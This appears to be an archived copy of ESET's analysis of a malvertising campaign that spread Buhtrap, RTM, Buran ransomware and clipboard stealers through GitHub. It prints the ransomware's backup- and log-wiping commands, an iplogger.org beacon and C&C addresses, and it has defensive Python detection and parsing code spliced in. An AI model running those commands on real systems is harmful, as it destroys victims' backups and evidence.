{
	"id": "609aec1c-f39b-4981-b7d0-233fd3badfdd",
	"created_at": "2026-04-06T00:19:33.262903Z",
	"updated_at": "2026-04-10T03:37:09.013245Z",
	"deleted_at": null,
	"sha1_hash": "d29c2b564287bab988ac4062aa3a61beb116e6cf",
	"title": "Buhtrap backdoor and Buran ransomware distributed via major advertising platform",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 626943,
	"plain_text": "Buhtrap backdoor and Buran ransomware distributed via major\r\nadvertising platform\r\nBy ESET Research\r\nArchived: 2026-04-05 14:59:50 UTC\r\nUPDATE (November 6, 2019): Although the ransomware distributed in this campaign exhibits links with other\r\nBuhtrap malware, we now believe that it is not linked with the original Buhtrap group. Therefore, we have decided to\r\nchange our original detection name for this ransomware to Win32/Filecoder.Buran. This should minimize any\r\nadditional confusion and be more in sync with other publications describing the same ransomware.\r\nWhat better way to target accountants than to target them as they search the web, looking for documents pertinent to\r\ntheir job? This is just what has been happening for the past few months, where a group using two well-known\r\nbackdoors — Buhtrap and RTM — as well as ransomware and cryptocurrency stealers, has targeted organizations,\r\nmainly in Russia. The targeting was made possible by posting malicious ads through Yandex.Direct, in an attempt to\r\nredirect a potential target to a website offering malicious downloads disguised as document templates. Yandex is\r\nknown to be the largest search engine on the internet in Russia. Yandex.Direct is its online advertising network.\r\nWe’ve contacted Yandex and they removed this malvertising campaign.\r\nWhile the Buhtrap backdoor source code has been leaked in the past and can thus be used by anyone, RTM code has\r\nnot, at least to our knowledge. In this blog, we will describe how the threat actors distributed their malware by\r\nabusing Yandex.Direct and hosted it on GitHub. 
We will conclude with a technical analysis of the malware used.\r\nDistribution mechanism and victims\r\nThe link that ties the different payloads together is how they were distributed: all malicious files created by the\r\ncybercriminals were hosted on two different GitHub repositories.\r\nThere was usually only one malicious file downloadable from the repo, but it would change frequently. Since change\r\nhistory is available from the GitHub repository, it allows us to know which malware was distributed at any given\r\ntime. One way victims would be lured into downloading these malicious files was through a website, blanki-shabloni24[.]ru, as shown in Figure 1.\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 1 of 26\n\nFigure 1. Landing page of blanki-shabloni24[.]ru\r\n \r\nThe website design as well as all malicious filenames were quite revealing: they were all about forms, templates and\r\ncontracts. The fake software name translates to: “Collection of Templates 2018: forms, templates, contracts,\r\nsamples”. Given the fact that Buhtrap and RTM have been used in the past to target accounting departments, we\r\nimmediately believed that a similar strategy was at play. But how were potential victims directed to the website?\r\nInfection campaigns\r\nAt least some of the potential victims who ended up on this website were lured there through malvertising. Below you\r\ncan see an example of a redirect URL to the malicious website:\r\nhttps://blanki-shabloni24.ru/?utm_source=yandex\u0026utm_medium=banner\u0026utm_campaign=cid|\r\n{blanki_rsya}|context\u0026utm_content=gid|3590756360|aid|6683792549|15114654950_\u0026utm_term=скачать бланк\r\nсчета\u0026pm_source=bb.f2.kz\u0026pm_block=none\u0026pm_position=0\u0026yclid=1029648968001296456\r\nWe can see in the URL that a banner ad was posted on bb.f2[.]kz, which is a legitimate accounting forum. 
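The redirect URL above carries the campaign metadata in plain query-string fields, which is what makes a table like Table 1 recoverable from proxy logs. The following Python is an added example, not code from the ESET post: it parses those fields and groups hits by campaign id. The first URL in the sample is the one quoted above; the other two are constructed, the placement host forum.example.invalid is a placeholder, and the third URL is a non-Yandex referrer included to show that it is ignored.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit


def _pipe_fields(value):
    # utm_campaign and utm_content carry a pipe-delimited key|value sequence
    # (observed: cid|{blanki_rsya}|context and gid|3590756360|aid|6683792549|15114654950_);
    # braces are stripped from values and a trailing odd item is kept as 'extra'.
    parts = value.split('|')
    fields = {}
    i = 0
    while i + 1 < len(parts):
        fields[parts[i]] = parts[i + 1].strip('{}')
        i += 2
    if i < len(parts):
        fields['extra'] = parts[i]
    return fields


def parse_direct_redirect(url):
    # Returns the fields worth pivoting on, or None when the URL does not carry
    # the utm_source=yandex marker (so unrelated proxy entries are skipped).
    split = urlsplit(url)
    qs = parse_qs(split.query, keep_blank_values=True)

    def first(key):
        return qs.get(key, [''])[0]

    if first('utm_source') != 'yandex':
        return None
    campaign = _pipe_fields(first('utm_campaign'))
    content = _pipe_fields(first('utm_content'))
    return {
        'landing_host': split.hostname,
        'campaign_id': campaign.get('cid', ''),
        'group_id': content.get('gid', ''),
        'ad_id': content.get('aid', ''),
        'search_term': first('utm_term'),
        'placement': first('pm_source'),
        'yclid': first('yclid'),
    }


def cluster_by_campaign(urls):
    # {campaign_id: {'placements': set of sites, 'terms': set of search terms}}
    clusters = defaultdict(lambda: {'placements': set(), 'terms': set()})
    for url in urls:
        hit = parse_direct_redirect(url)
        if hit is None:
            continue
        clusters[hit['campaign_id']]['placements'].add(hit['placement'])
        clusters[hit['campaign_id']]['terms'].add(hit['search_term'])
    return dict(clusters)


# The first URL is the one quoted in the post.  The second is a constructed
# variant (placeholder placement host, different ad) and the third is a
# constructed non-Yandex referrer that must be ignored.
SAMPLE_URLS = [
    'https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456',
    'https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|1|aid|2|3_&utm_term=образец договора&pm_source=forum.example.invalid&yclid=1',
    'https://blanki-shabloni24.ru/?utm_source=other&utm_campaign=cid|{unrelated}|search',
]

if __name__ == '__main__':
    for cid, info in cluster_by_campaign(SAMPLE_URLS).items():
        print(cid, sorted(info['placements']), sorted(info['terms']))
```

Run over a day of proxy logs filtered on the landing domain, the output of cluster_by_campaign is the list of placement sites and search terms per campaign id, i.e. the raw material for Table 1.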
It is important to note here that these banners appeared on several different websites, all with the same campaign id (blanki_rsya), and most of them related to accounting or legal aid services. From the URL, we can also see what the user was searching for, “скачать бланк счета” or “download invoice template”, reinforcing our hypothesis that organizations are targeted. A list of the websites where the banners and the related search terms appeared is shown in Table 1.\r\nSearch term (RU) | Search term (EN, Google Translate) | Domain\r\nскачать бланк счета | download invoice template | bb.f2[.]kz\r\nобразец договора | contract example | Ipopen[.]ru\r\nзаявление жалоба образец | claim complaint example | 77metrov[.]ru\r\nбланк договора | contract form | blank-dogovor-kupli-prodazhi[.]ru\r\nсудебное ходатайство образец | judicial petition example | zen.yandex[.]ru\r\nобразец жалобы | example complaint | yurday[.]ru\r\nобразцы бланков договоров | example contract forms | Regforum[.]ru\r\nбланк договора | contract form | assistentus[.]ru\r\nобразец договора квартиры | example apartment contract | napravah[.]com\r\nобразцы юридических договоров | examples of legal contracts | avito[.]ru\r\nTable 1. Search terms used and domains where the banners were displayed\r\nThe blanki-shabloni24[.]ru website was probably set up this way to survive basic scrutiny: an ad pointing to a professional-looking website with a link to GitHub is not something obviously bad. Moreover, the cybercriminals put the malicious files on their GitHub repository only for a limited period of time, probably while the ad campaign was active. Most of the time, the payload on GitHub was an empty zip file or a clean executable. 
To summarize, the cybercriminals were able to distribute ads through the Yandex.Direct service to websites that were likely to be visited by accountants searching for specific terms.\r\nLet’s now take a look at the different payloads that were distributed this way.\r\nPayload Analysis\r\nDistribution timeline\r\nThis malware campaign started in late October 2018 and is still active at the time of writing. Since the whole repository was publicly available on GitHub, we were able to draw a precise timeline of the malware families distributed (see Figure 2). We’ve observed six different malware families being hosted on GitHub over this period. We’ve added a line that illustrates when the banner links were seen, based on ESET telemetry, to compare it with the git history. We can see that it correlates pretty well with the moments the payloads were available on GitHub. The discrepancy at the end of February may be explained by the possibility that we lack some of the history because the repository was removed from GitHub before we were able to fetch all of it.\r\nFigure 2. Timeline of the malware distribution\r\nCode-signing certificates\r\nMultiple code-signing certificates were used to sign malware distributed during this campaign. Some of the certificates were used to sign more than one malware family, an additional indicator linking the various malware samples to the same campaign. The operators did not systematically sign the binaries they pushed to the git repository. It is surprising, given that they had access to the private keys of these certificates, that they didn’t use them for all of the binaries. 
At the end of February 2019, the operators also started attaching invalid signatures made with a certificate belonging to Google, for which they do not possess the private key: such a signature does not verify, but the signer name can pass a casual glance at the file properties.\r\nAll the certificates involved in this campaign, and the malware families that they signed, are displayed in Table 2.\r\nCert’s CN | Thumbprint | Signed malware family\r\nTOV TEMA LLC | 775E9905489B5BB4296D1AD85F3E45BC936E7FDC | Win32/ClipBanker\r\nTOV \"MARIYA\" | EE6FAF6FD2888A6D11DD710B586B78E794FC74FC | Win32/ClipBanker\r\n\"VERY EXCLUSIVE LTD\" | BD129D61914D3A6B5F4B634976E864C91B6DBC8E | Win32/Spy.Buhtrap\r\n\"VERY EXCLUSIVE LTD.\" | 764F182C1F46B380249CAFB8BA3E7487FAF21E2A | Win32/Filecoder.Buran\r\nTRAHELEN LIMITED | 7C1D7CE90000B0E603362F294BC4A85679E38439 | Win32/Spy.RTM\r\nLEDI, TOV | 15FEA3B0B839A58AABC6A604F4831B07097C8018 | Win32/Filecoder.Buran\r\nGoogle Inc | 1A6AC0549A4A44264DEB6FF003391DA2F285B19F | Win32/Filecoder.Buran, MSIL/ClipBanker\r\nTable 2. List of certificates and malware signed by them\r\nWe also used these code-signing certificates to see if we could establish links with other malware families. For most of the certificates, we didn’t find malware that wasn’t distributed via the GitHub repository. However, the TOV “MARIYA” certificate was also used to sign malware belonging to the Wauchos botnet as well as some adware and coin miners. It is very unlikely that these malware variants were linked to the campaign we analyzed; it is more probable that the certificate was bought on some online black market.\r\nWin32/Filecoder.Buran\r\nThe component that first attracted our attention is the previously unseen Win32/Filecoder.Buran. It is a Delphi binary that sometimes comes packed. It was mainly distributed during February and March of 2019. 
It implements the expected behavior of ransomware, discovering local drives and network shares and encrypting files found on these devices. It doesn’t require an internet connection to encrypt its victims’ files, since it doesn’t communicate with a server to send the encryption keys. Instead, it appends a “token” at the end of the ransom message and demands that the victims communicate with the operators via email or Bitmessage. The ransom note may be found in Appendix A.\r\nTo encrypt as many important resources as possible, Filecoder.Buran starts a thread dedicated to killing key software that might have open handles on files containing valuable data, which would otherwise prevent those files from being encrypted. The targeted processes are mainly database management systems (DBMS). Furthermore, Filecoder.Buran removes backups and log files, to make it as difficult as possible for victims without any offline backups to recover their files. To do so, the batch script in Figure 3 is executed: it disables Windows recovery at boot, deletes the backup catalog and all volume shadow copies, wipes the RDP connection history, clears the Application, Security and System event logs and disables the EventLog service.\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit /set {default} recoveryenabled no\r\nwbadmin delete catalog -quiet\r\nwbadmin delete systemstatebackup\r\nwbadmin delete systemstatebackup -keepversions:0\r\nwbadmin delete backup\r\nwmic shadowcopy delete\r\nvssadmin delete shadows /all /quiet\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f\r\nreg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f\r\nreg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"\r\nattrib \"%userprofile%\\documents\\Default.rdp\" -s -h\r\ndel \"%userprofile%\\documents\\Default.rdp\"\r\nwevtutil.exe clear-log Application\r\nwevtutil.exe clear-log Security\r\nwevtutil.exe clear-log System\r\nsc config eventlog start=disabled\r\nFigure 3. 
Script to remove backups and log files\r\nFilecoder.Buran uses the legitimate online service IP Logger, which is designed to gather information about who is visiting a website, to keep track of the ransomware’s victims. The command line in Figure 4 is responsible for this.\r\nmshta.exe \"javascript:document.write('\u003cimg src=\\'https://iplogger.org/173Es7.txt\\'\u003e\u003cscript\u003esetInterval(function(){close();},10000);\u003c/script\u003e');\"\r\nFigure 4. Query to iplogger.org\r\nA file is encrypted only if it matches none of three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings listed in Figure 5 are excluded.\r\n\\.{ED7BA470-8E54-465E-825C-99712043E01C}\\\r\n\\tor browser\\\r\n\\opera\\\r\n\\opera software\\\r\n\\mozilla\\\r\n\\mozilla firefox\\\r\n\\internet explorer\\\r\n\\google\\chrome\\\r\n\\google\\\r\n\\boot\\\r\n\\application data\\\r\n\\apple computer\\safari\\\r\n\\appdata\\\r\n\\all users\\\r\n:\\windows\\\r\n:\\system volume information\\\r\n:\\nvidia\\\r\n:\\intel\\\r\nFigure 5. Directories excluded from encryption\r\nAnd third, specific filenames are excluded from encryption, among them the filename of the ransom note. Figure 6 shows this list. Combined, these exclusions are clearly intended to leave an encrypted victim machine bootable, and minimally usable.\r\nboot.ini\r\nbootfont.bin\r\nbootsect.bak\r\ndesktop.ini\r\niconcache.db\r\nntdetect.com\r\nntldr\r\nntuser.dat\r\nntuser.dat.log\r\nntuser.ini\r\nthumbs.db\r\nwinupas.exe\r\nyour files are now encrypted.txt\r\nwindows update assistant.lnk\r\nmaster.exe\r\nunlock.exe\r\nunlocker.exe\r\nFigure 6. 
Files excluded from encryption\r\nFile encryption scheme\r\nWhen the malware is launched, it generates a 512-bit RSA key pair. The private exponent (d) and the modulus (n) are then encrypted using a hardcoded 2048-bit public key (public exponent and modulus), zlib compressed and base64 encoded. The code responsible for this is shown in Figure 7.\r\nFigure 7. Hex-Rays decompiler output of the 512-bit RSA key pair generation routine\r\nFigure 8 shows an example of the plaintext version of the generated private key that constitutes the token appended to the ransom note.\r\n\u003cN\u003eDF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B23\r\nFigure 8. Example of a generated private key\r\nThe attacker’s public key is shown in Figure 9.\r\ne = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C65\r\nn = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746\r\nFigure 9. Hardcoded RSA public key\r\nThe files are encrypted using AES-128-CBC with a 256-bit key. For each file to be encrypted, a new key and a new initialization vector are generated. The key information is appended to the end of the encrypted file. Let’s examine the format of an encrypted file.\r\nEncrypted files have the following header:\r\nMagic header | Encrypted size | Decrypted size | Encrypted data\r\n0x56 0x1A | uint64_t | uint64_t | encrypt('VEGA' + filedata[:0x5000])\r\nThe data from the original file, prepended with the magic value “VEGA”, is encrypted up to the first 0x5000 bytes. 
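The Figure 3 script and the encrypted-file layout (the header above, the trailer table that follows) are the two parts of this section an incident responder most often has to act on. The following Python is an added example, not ESET's code. Its first half runs detection patterns for the Figure 3 commands over constructed process-creation log lines (not real telemetry; paths are written with forward slashes for brevity). Its second half builds a file in the described layout and parses it back. Points the post does not state and that are assumed here: integers are little-endian, the trailing uint32 is the offset of the file size marker counted from the start of the file, any data beyond the first 0x5000 bytes follows the ciphertext untouched, the decrypted-size field counts the VEGA-prefixed plaintext, and 0x02 marks files larger than 0x5000 bytes. The XOR stand-in for AES in the builder exists only so the example runs offline.

```python
import re
import struct
import zlib

# ---- (1) detection for the Figure 3 commands ------------------------------
# Patterns are deliberately loose (flags may be reordered or omitted) and are
# matched case-insensitively against the whole log line.
BACKUP_TAMPER_PATTERNS = {
    'shadow_copy_deletion': re.compile(r'vssadmin([.]exe)? +delete +shadows|wmic([.]exe)? +shadowcopy +delete', re.I),
    'backup_catalog_deletion': re.compile(r'wbadmin([.]exe)? +delete +(catalog|systemstatebackup|backup)', re.I),
    'recovery_disabled': re.compile(r'bcdedit([.]exe)? +/set +[{]default[}] +(recoveryenabled +no|bootstatuspolicy +ignoreallfailures)', re.I),
    'event_log_cleared': re.compile(r'wevtutil([.]exe)? +(cl|clear-log) +(application|security|system)', re.I),
    'event_log_service_disabled': re.compile(r'sc([.]exe)? +config +eventlog +start= *disabled', re.I),
}


def flag_backup_tampering(log_lines):
    # Returns [(line_number, behaviour)] for every matching line.
    hits = []
    for n, line in enumerate(log_lines, 1):
        for behaviour, pattern in BACKUP_TAMPER_PATTERNS.items():
            if pattern.search(line):
                hits.append((n, behaviour))
    return hits


# Constructed Sysmon-style process-creation lines, not real telemetry.
SAMPLE_LOG = [
    'EventID=1 Image=C:/Windows/System32/cmd.exe CommandLine=cmd /c vssadmin delete shadows /all /quiet',
    'EventID=1 Image=C:/Windows/System32/wbem/WMIC.exe CommandLine=wmic shadowcopy delete',
    'EventID=1 Image=C:/Windows/System32/bcdedit.exe CommandLine=bcdedit /set {default} recoveryenabled no',
    'EventID=1 Image=C:/Windows/System32/wevtutil.exe CommandLine=wevtutil.exe clear-log Security',
    'EventID=1 Image=C:/Windows/System32/sc.exe CommandLine=sc config eventlog start=disabled',
    'EventID=1 Image=C:/Windows/System32/wbadmin.exe CommandLine=wbadmin delete catalog -quiet',
    'EventID=1 Image=C:/Program Files/Backup/agent.exe CommandLine=agent.exe --list shadows',
]

# ---- (2) encrypted-file layout --------------------------------------------
MAGIC = bytes([0x56, 0x1A])
HEADER = struct.Struct('<2sQQ')   # magic, encrypted size, decrypted size (assumed little-endian)
BODY_LIMIT = 0x5000               # only the first 0x5000 bytes of a file are encrypted
VEGA = b'VEGA'


def parse_encrypted_file(data):
    # Returns the pieces of a Buran-encrypted file, or None if the magic is
    # absent.  Blobs are zlib-inflated but stay RSA-wrapped: unwrapping needs
    # the operators' 2048-bit private key, which the victim does not have.
    if len(data) < HEADER.size + 4 or data[:2] != MAGIC:
        return None
    _, enc_size, dec_size = HEADER.unpack_from(data)
    marker_off = struct.unpack_from('<I', data, len(data) - 4)[0]   # assumed: offset from file start
    if marker_off >= len(data) - 4:
        raise ValueError('offset field points outside the file')
    pos = marker_off
    size_marker = data[pos]
    pos += 1
    aes_len = struct.unpack_from('<I', data, pos)[0]
    pos += 4
    aes_blob = data[pos:pos + aes_len]
    pos += aes_len
    rsa_len = struct.unpack_from('<I', data, pos)[0]
    pos += 4
    rsa_blob = data[pos:pos + rsa_len]
    pos += rsa_len
    if pos != len(data) - 4:
        raise ValueError('trailer does not end at the offset field')
    return {
        'encrypted_size': enc_size,
        'decrypted_size': dec_size,
        'size_marker': size_marker,
        'ciphertext': data[HEADER.size:HEADER.size + enc_size],
        'untouched_tail': data[HEADER.size + enc_size:marker_off],
        'wrapped_aes_key': zlib.decompress(aes_blob),
        'wrapped_rsa_private_key': zlib.decompress(rsa_blob),
    }


def decrypted_block_is_valid(decrypted):
    # A decryptor confirms it used the right AES key by checking the VEGA
    # prefix inserted before the original data.
    return decrypted[:4] == VEGA


def build_sample_file(plaintext, wrapped_aes, wrapped_rsa, fake_encrypt):
    # Test-only builder for the layout above; fake_encrypt stands in for
    # AES-CBC so the example runs offline.
    head, tail = plaintext[:BODY_LIMIT], plaintext[BODY_LIMIT:]
    ciphertext = fake_encrypt(VEGA + head)
    body = HEADER.pack(MAGIC, len(ciphertext), len(VEGA + head)) + ciphertext + tail
    size_marker = 0x02 if len(plaintext) > BODY_LIMIT else 0x01   # assumed meaning of 0x01/0x02
    aes_blob, rsa_blob = zlib.compress(wrapped_aes), zlib.compress(wrapped_rsa)
    trailer = bytes([size_marker]) + struct.pack('<I', len(aes_blob)) + aes_blob
    trailer += struct.pack('<I', len(rsa_blob)) + rsa_blob + struct.pack('<I', len(body))
    return body + trailer


if __name__ == '__main__':
    print(flag_backup_tampering(SAMPLE_LOG))
    xor = lambda b: bytes(x ^ 0x5A for x in b)
    info = parse_encrypted_file(build_sample_file(bytes(range(256)) * 100, b'K' * 48, b'P' * 64, xor))
    print(info['size_marker'], info['encrypted_size'], decrypted_block_is_valid(xor(info['ciphertext'])))
```

The detection half is the part to deploy: any one of those behaviours from a non-backup process is worth an alert on its own, and the Figure 3 script fires all of them within seconds. The parser is for triage after the fact; it tells you how much of a large file was left in clear and recovers the wrapped blobs, but decryption still requires the operators' private key.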
All the information necessary to decrypt the file is appended to the file with this structure:\r\nFile size marker | Size of AES key blob | AES key blob | Size of RSA key blob | RSA key blob | Offset to file size marker\r\n0x01 or 0x02 | uint32_t | variable | uint32_t | variable | uint32_t\r\nThe file size marker is a flag that indicates whether the file size is \u003e 0x5000 bytes.\r\nAES key blob = ZlibCompress(RSAEncrypt(AES key + IV, generated RSA key pair's public key))\r\nRSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hardcoded RSA public key))\r\nOnly the operators, who hold the private key matching the hardcoded public key, can unwrap the generated private key, and only that private key can unwrap the per-file AES keys: the token in the ransom note is therefore all they need to build a decryptor, and the malware never has to go online.\r\nWin32/ClipBanker\r\nWin32/ClipBanker is a component that was distributed intermittently from the end of October to early December 2018. Its role is to monitor the content of the clipboard, looking for cryptocurrency addresses. If a targeted cryptocurrency address is found, it is replaced by an address presumably belonging to the malware operator. The samples we looked at are neither packed nor obfuscated; the only mechanism used to hide its behavior is string encryption. The operators’ cryptocurrency addresses are encrypted using RC4. Various cryptocurrencies are targeted, such as Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.\r\nA negligible amount of BTC was sent to the attacker’s Bitcoin addresses during the time of distribution, which suggests the campaign wasn’t very successful. Additionally, there is no way to be sure that these transactions are related to this malware.\r\nWin32/RTM\r\nWin32/RTM is a component that was distributed for a few days at the beginning of March 2019. RTM is a banking trojan written in Delphi that targets remote banking systems. Back in 2017, ESET researchers published a white paper that contains an extensive analysis of this malware. 
As little has changed since then, we suggest the interested reader refer to that publication for more details. In January 2019, Palo Alto Networks also released a blogpost about this malware.\r\nBuhtrap downloader\r\nFor a short period of time, the package available from GitHub was a downloader that bore no resemblance to past Buhtrap tooling. This downloader reaches out to https://94.100.18[.]67/RSS.php?\u003csome_id\u003e to get the next stage and loads it directly in memory. We identified two different behaviors for this second-stage code. In one, the RSS.php URL served the Buhtrap backdoor directly. This backdoor is very similar to the one available through the leaked source code.\r\nOf interest here is that we see several different campaigns using the Buhtrap backdoor, presumably coming from different actors. The main differences in this case are that, first, the backdoor is loaded directly in memory, not using the usual DLL side-loading trick documented in our previous blog, and second, they changed the RC4 key used to encrypt network traffic to the C\u0026C server. Most of the campaigns we see in the wild do not even bother to change this key.\r\nIn the other, more intricate, case we’ve seen, the RSS.php URL served another downloader. This downloader implements some obfuscation such as dynamic import table reconstruction. The ultimate goal of this downloader is to contact a C\u0026C server at https://msiofficeupd[.]com/api/F27F84EDA4D13B15/2 to send logs and wait for a response. It treats the latter as a binary blob, loads it in memory and executes it. The payload we’ve seen this downloader execute was the same Buhtrap backdoor described above, but other payloads may exist.\r\nAndroid/Spy.Banker\r\nInterestingly, an Android component was also found on the GitHub repository. It was only on the master branch for one day, on November 1st 2018. 
Apart from the fact that it was hosted on GitHub on that day, ESET telemetry shows no evidence of active distribution of this malware.\r\nThe Android component was hosted on GitHub as an Android Application Package (APK). It is heavily obfuscated. The malicious behavior is concealed in an encrypted JAR located in the APK. It is encrypted with RC4 using this key:\r\nkey = [\r\n0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,\r\n0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,\r\n0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96\r\n]\r\nThe same key and algorithm are used to encrypt the strings. The JAR is located under APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which begins immediately after the length field.\r\nOnce we decrypted the file, it became obvious that it was Anubis, an already documented Android banker. This malware has the following capabilities:\r\nRecord microphone\r\nTake screenshot\r\nGet GPS position\r\nLog keystrokes\r\nEncrypt device data and demand ransom\r\nSend spam\r\nThe C\u0026C servers are:\r\nsositehuypidarasi[.]com\r\nktosdelaetskrintotpidor[.]com\r\nInterestingly, it used Twitter as a fallback communication channel to retrieve another C\u0026C server. The Twitter account used by the sample we analyzed is @JohnesTrader, but this account was already suspended at the time of analysis.\r\nThe malware contains a list of targeted applications on the Android device. This list seems to be longer than it was when Sophos researchers analyzed it. It targets a lot of banking applications for banks from all over the world, some e-shopping apps like Amazon and eBay, and cryptocurrency apps. 
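The container described above (4-byte length, then the RC4-encrypted JAR under image/files, same key and cipher for the strings) is simple enough to unpack with the standard library. The following is an added example, not ESET's code. It uses the key quoted above, assumes the length prefix is big-endian (Java DataOutputStream order, which the post does not state), and exercises the round trip on a constructed container rather than on the real APK; the entry names in the constructed JAR are placeholders.

```python
import io
import struct
import zipfile

# RC4 key quoted in the post (37 bytes).
RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])
ZIP_MAGIC = bytes([0x50, 0x4B, 0x03, 0x04])   # PK local file header; a JAR is a ZIP


def rc4(key, data):
    # Plain RC4 (KSA + PRGA); encryption and decryption are the same operation.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray(len(data))
    i = j = 0
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out[n] = byte ^ S[(S[i] + S[j]) & 0xFF]
    return bytes(out)


def unpack_embedded_jar(container):
    # container = 4-byte length prefix (assumed big-endian) + RC4(JAR).  The
    # stated length must fit in the file and the plaintext must be a ZIP;
    # both checks catch a wrong key or a different sample format early.
    if len(container) < 4:
        raise ValueError('container too short for a length prefix')
    length = struct.unpack('>I', container[:4])[0]
    if length == 0 or 4 + length > len(container):
        raise ValueError('length field %d exceeds container size %d' % (length, len(container)))
    jar = rc4(RC4_KEY, container[4:4 + length])
    if not jar.startswith(ZIP_MAGIC):
        raise ValueError('decrypted data is not a ZIP/JAR: wrong key or format')
    return jar


def decrypt_string(blob):
    # The post says the strings use the same key and algorithm as the JAR.
    return rc4(RC4_KEY, blob).decode('utf-8')


def jar_entry_names(jar):
    return sorted(zipfile.ZipFile(io.BytesIO(jar)).namelist())


def build_constructed_container(entries):
    # Test-only: pack entries into a ZIP, RC4 it and prefix the length.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        for name, content in entries.items():
            z.writestr(name, content)
    jar = buf.getvalue()
    return struct.pack('>I', len(jar)) + rc4(RC4_KEY, jar)


if __name__ == '__main__':
    c = build_constructed_container({'classes.dex': b'dex', 'AndroidManifest.xml': b'<manifest/>'})
    print(jar_entry_names(unpack_embedded_jar(c)))
```

Against a real sample, read image/files out of the APK (an APK is itself a ZIP) and pass its bytes to unpack_embedded_jar; if the ZIP check fails, try the other byte order for the length field before assuming a different key.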
We have included the full list in Appendix B.\r\nMSIL/ClipBanker.IH\r\nThe latest component to be distributed during the campaign covered in this blogpost is a .NET Windows executable, distributed in March 2019. Most of the versions we looked at were packed with ConfuserEx v1.0.0. As with the ClipBanker variant described above, this component also hijacks the clipboard. It targets a wide range of cryptocurrencies as well as Steam trade offers. Furthermore, it uses the IP Logger service to exfiltrate Bitcoin private keys in wallet import format (WIF).\r\nDefensive mechanisms\r\nIn addition to benefiting from ConfuserEx’s anti-debugging, anti-dumping and anti-tampering mechanisms, this malware implements detection routines for security products and virtual machines.\r\nTo check if it is running in a virtual machine, it uses Windows’ built-in WMI command-line tool (WMIC) to query information about the BIOS, specifically:\r\nwmic bios\r\nIt then parses the output of the command looking for these specific keywords: VBOX, VirtualBox, XEN, qemu, bochs, VM.\r\nTo detect security products, the malware sends a Windows Management Instrumentation (WMI) query to Windows Security Center using the ManagementObjectSearcher API, as shown in Figure 10. Once base64-decoded, the call is:\r\nManagementObjectSearcher('root\\\\SecurityCenter2', 'SELECT * FROM AntivirusProduct')\r\nFigure 10. Security product detection routine\r\nFurthermore, the malware checks whether CryptoClipWatcher, a defensive tool designed to protect users from clipboard hijacking, is running and, if so, suspends all the threads of this process, thus disabling the protection.\r\nPersistence\r\nIn the version we analyzed, the malware copies itself into %APPDATA%\\google\\updater.exe and sets the hidden flag on the google directory. 
Then, it modifies the Windows Registry’s Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell value and appends the path of updater.exe. Hence, every time a user logs in, the malware is executed.\r\nMalicious behavior\r\nAs was the case with the previous ClipBanker we analyzed, this .NET malware monitors the content of the clipboard, looking for cryptocurrency addresses, and if one is found, it is replaced with one of the operator’s addresses. Figure 11 displays a list of the targeted address types, based on an enum found within the code.\r\nBTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR,\r\nFigure 11. Enum symbol for supported address types\r\nFor each of these address types there is an associated regular expression. The STEAM_URL value is for hijacking Steam’s trade offer system, as we can see in the regular expression used to detect it in the clipboard:\r\n\\b(https:\\/\\/|http:\\/\\/|)steamcommunity\\.com\\/tradeoffer\\/new\\/\\?partner=[0-9]+\u0026token=[a-zA-Z0-9]+\\b\r\nExfiltration channel\r\nIn addition to replacing addresses in the clipboard, this .NET malware also targets Bitcoin WIF private keys, Bitcoin Core wallets and Electrum Bitcoin wallets. 